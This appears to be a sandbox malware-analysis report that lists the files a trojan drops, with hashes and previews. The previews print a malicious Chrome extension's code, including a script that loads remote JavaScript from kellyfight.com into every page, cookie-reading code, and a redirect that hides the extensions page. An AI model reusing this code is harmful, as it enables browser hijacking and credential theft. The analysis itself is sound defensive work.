SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1618258531828 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\background.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\book.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgnliiolndkgeojpohkplpfbdgnhnmaa\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5453
Entropy (8bit):	5.17633461106724
Encrypted:	false
SSDEEP:	96:nHXbTqqz/X7jgFcKIV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFc7on4KsX
MD5:	D2A3438928817FF373327D7D694CCBA3
SHA1:	19DD3CC319D3EE4A73B9C91C414DE4E3A08F7835
SHA-256:	8C63A4D6C9058AC67B649A5F7E061565110C438D01C26CB8CEB500DF8EC14463
SHA-512:	7CB148E8F1500329E02A6AFEA371A30694A96F286E95E6F5CB271208A4178526E038D7A7D98FEF020E1EAF9C58952FE62139C075361E8F72D76329BC6D1E8C11
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.538293404797988
Encrypted:	false
SSDEEP:	768:AEpwDFUckPWlr+udLl0b1kXqKf/pUZNCgVLH2HfVrUkGRnLz7W2:Eh5LwjRn/7n
MD5:	5C13576F955A518D8F2E4E06153E5C6A
SHA1:	1EE4B0AF0F2FCB3F12A2FA9C93BAF04EACBA0219
SHA-256:	978BCAFA1444FAB7CDA3606C0E173B3C4E9C8ED8B9AE5D9C579FB8F518D51475
SHA-512:	89EACCBD59FD2DF25460C93EF0B0606655CB29BDE29EFE53A10AE0D44DFF409A3A1FF47F9258A596CCBFBB69F3DC60209171270F319D0708E706068B9F1C3612
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1618258522140 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1618258531687 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1618258523374 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1618258526265 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4255416
Entropy (8bit):	7.866429705903183
Encrypted:	false
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
MD5:	29389832E538957DC769CF709F80144A
SHA1:	72F5CA06D840ACBC9B49E4096E341C0DBAAC891E
SHA-256:	D6D2E00343A3CAD48CC2F4799CE87D27ACC3CE154AED286C07F226DE2E9C4035
SHA-512:	5F787359FBC37D8BED92DA38E80106CC257C2339488CA956759B33024AA61194BB87FAA8DB841DED486D5BBA253CE44342DD206CF93A9751DE95784F5EE79F05
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 28%, Browse Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0...................................................... ..@............ ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc...@.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSI39DD.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
